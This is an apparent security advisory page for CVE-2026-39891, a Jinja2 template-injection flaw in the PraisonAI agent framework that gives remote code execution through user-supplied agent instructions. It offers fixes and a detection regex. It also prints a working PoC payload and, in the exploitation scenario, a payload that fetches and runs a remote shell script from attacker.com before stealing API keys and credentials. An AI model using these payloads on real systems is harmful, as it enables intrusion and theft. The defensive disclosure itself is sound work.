CVE-2026-39891: praisonai: SSTI enables RCE via agent instructions

GHSA-hwg5-x759-7wjg HIGH PoC AVAILABLE CISA: ATTEND
Published April 8, 2026
CISO Take

PraisonAI contains a server-side template injection (SSTI) vulnerability where user-controlled input passed to agent.start() is rendered directly through Jinja2-style templates without sanitization, enabling arbitrary OS command execution on the host with the process's full privileges. With a CVSS of 8.8 (network-accessible, low privilege required, no user interaction), the blast radius covers any deployment where agent instructions are user-supplied — SaaS platforms, internal tooling, and agentic pipelines built on PraisonAI — and the framework's default auto-approval mode removes the human-in-the-loop safeguard that might otherwise block file operations. A working PoC using standard Jinja2 payloads is publicly documented in the advisory, making exploitation trivially reproducible without deep AI/ML expertise, and this package carries 9 other CVEs signaling persistent security debt. Patch immediately to praisonai>=4.5.115; if patching is delayed, disable approval_mode='auto', strip template syntax from user input, and isolate agent processes with minimal OS privileges.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

High risk. CVSS 8.8 with low-privilege network access, no user interaction required, and a published PoC using standard Jinja2 SSTI payloads makes this trivially exploitable by any authenticated user. The auto-approval mode ('approval_mode=auto') eliminates the last procedural safeguard against unauthorized file operations. Any service exposing agent.start() to external input — directly or via API — is fully compromisable. Nine prior CVEs in the same package indicate a pattern of insufficient security review in this codebase, increasing confidence that additional attack surface exists.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
PraisonAI pip <= 4.5.114 4.5.115
1 dependents 82% patched ~0d to patch Full package profile →

Do you use PraisonAI? You're affected.

How severe is it?

CVSS 3.1
8.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 42% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. PATCH

    Upgrade praisonai to version 4.5.115 immediately — this is the authoritative fix.

  2. WORKAROUND (if patching is delayed): Set approval_mode to manual/supervised to require human confirmation for all file operations; audit every call to agent.start() for unsanitized user input paths.

  3. INPUT SANITIZATION

    Escape or strip Jinja2 template syntax characters ('{{', '}}', '{%', '%}') from user-supplied content before passing to any agent tool. Enable Jinja2 autoescape=True as defense-in-depth.

  4. SANDBOXING

    Run PraisonAI agent processes in isolated containers with dropped capabilities (no network egress, read-only filesystem where possible, non-root UID).

  5. DETECTION

    Alert on template expression patterns in agent inputs (regex: \{\{.*\}\}, __import__, os.system, subprocess); monitor for unexpected file creation in /tmp or world-writable directories; review process spawn logs for unusual child processes from the agent runtime.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.8.2 - AI System Design and Development
NIST AI RMF
MANAGE-2.2 - Risk Treatment
OWASP LLM Top 10
LLM01 - Prompt Injection LLM07 - Insecure Plugin Design LLM08 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-39891?

PraisonAI contains a server-side template injection (SSTI) vulnerability where user-controlled input passed to agent.start() is rendered directly through Jinja2-style templates without sanitization, enabling arbitrary OS command execution on the host with the process's full privileges. With a CVSS of 8.8 (network-accessible, low privilege required, no user interaction), the blast radius covers any deployment where agent instructions are user-supplied — SaaS platforms, internal tooling, and agentic pipelines built on PraisonAI — and the framework's default auto-approval mode removes the human-in-the-loop safeguard that might otherwise block file operations. A working PoC using standard Jinja2 payloads is publicly documented in the advisory, making exploitation trivially reproducible without deep AI/ML expertise, and this package carries 9 other CVEs signaling persistent security debt. Patch immediately to praisonai>=4.5.115; if patching is delayed, disable approval_mode='auto', strip template syntax from user input, and isolate agent processes with minimal OS privileges.

Is CVE-2026-39891 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-39891, increasing the risk of exploitation.

How to fix CVE-2026-39891?

1. PATCH: Upgrade praisonai to version 4.5.115 immediately — this is the authoritative fix. 2. WORKAROUND (if patching is delayed): Set approval_mode to manual/supervised to require human confirmation for all file operations; audit every call to agent.start() for unsanitized user input paths. 3. INPUT SANITIZATION: Escape or strip Jinja2 template syntax characters ('{{', '}}', '{%', '%}') from user-supplied content before passing to any agent tool. Enable Jinja2 autoescape=True as defense-in-depth. 4. SANDBOXING: Run PraisonAI agent processes in isolated containers with dropped capabilities (no network egress, read-only filesystem where possible, non-root UID). 5. DETECTION: Alert on template expression patterns in agent inputs (regex: \{\{.*\}\}, __import__, os.system, subprocess); monitor for unexpected file creation in /tmp or world-writable directories; review process spawn logs for unusual child processes from the agent runtime.

What systems are affected by CVE-2026-39891?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-agent orchestration, AI agent pipelines.

What is the CVSS score for CVE-2026-39891?

CVE-2026-39891 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.56%.

What is the AI security impact?

Affected AI Architectures

agent frameworksmulti-agent orchestrationAI agent pipelines

MITRE ATLAS Techniques

AML.T0050 Command and Scripting Interpreter
AML.T0051.000 Direct
AML.T0053 AI Agent Tool Invocation
AML.T0110 AI Agent Tool Poisoning
AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Art.15
ISO 42001: A.8.2
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM01, LLM07, LLM08

What are the technical details?

Original Advisory

## Summary Direct insertion of unescaped user input into template-rendering tools allows arbitrary code execution via specially crafted agent instructions. ## Details The `create_agent_centric_tools()` function returns tools (like `acp_create_file`) that process file content using template rendering. When user input from `agent.start()` is passed directly into these tools without escaping (as shown in `agent_centric_example.py:85-86`), template expressions in the input are executed rather than treated as literal text. This occurs because: 1. No input sanitization or escaping is applied to user-controlled content 2. The ACP-enabled runtime auto-approves operations (`approval_mode="auto"`) 3. Tools lack context-aware escaping for template syntax ## PoC ```python # Replace the agent.start() call at line 85 with: result = agent.start('Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("touch /tmp/pwned") }}') ``` Successful exploitation creates `/tmp/pwned` confirming arbitrary command execution. The expression `{{7*7}}` renders as `49` instead of literal text. ## Impact Attackers can execute arbitrary system commands with the privileges of the running process by injecting malicious template expressions through agent instructions. This compromises the host system, enabling data theft, ransomware deployment, or lateral movement. ## Recommended Fix 1. **Input Sanitization**: Implement strict whitelist validation for file content 2. **Contextual Escaping**: Auto-escape template syntax characters (e.g., `{{ }}`) in user input using Jinja2 `autoescape=True` 3. **Sandboxing**: Restrict template execution environments using secure eval modes 4. **Approval Hardening**: Require manual approval for file creation operations in production

Exploitation Scenario

An adversary with a low-privilege authenticated account on a platform using PraisonAI submits a crafted agent instruction: 'Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("curl attacker.com/shell.sh | bash") }}'. The agent.start() call passes this string directly to acp_create_file without sanitization. The Jinja2 engine evaluates the embedded expression, executing the OS command with the web server process's privileges. With auto-approval mode active, no human review interrupts the chain. The attacker establishes a reverse shell, exfiltrates environment variables containing LLM provider API keys and database credentials, then pivots laterally into the internal AI infrastructure. The entire chain from injection to shell takes seconds and requires no specialized tooling.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
April 8, 2026
Last Modified
April 9, 2026
First Seen
April 8, 2026

Related Vulnerabilities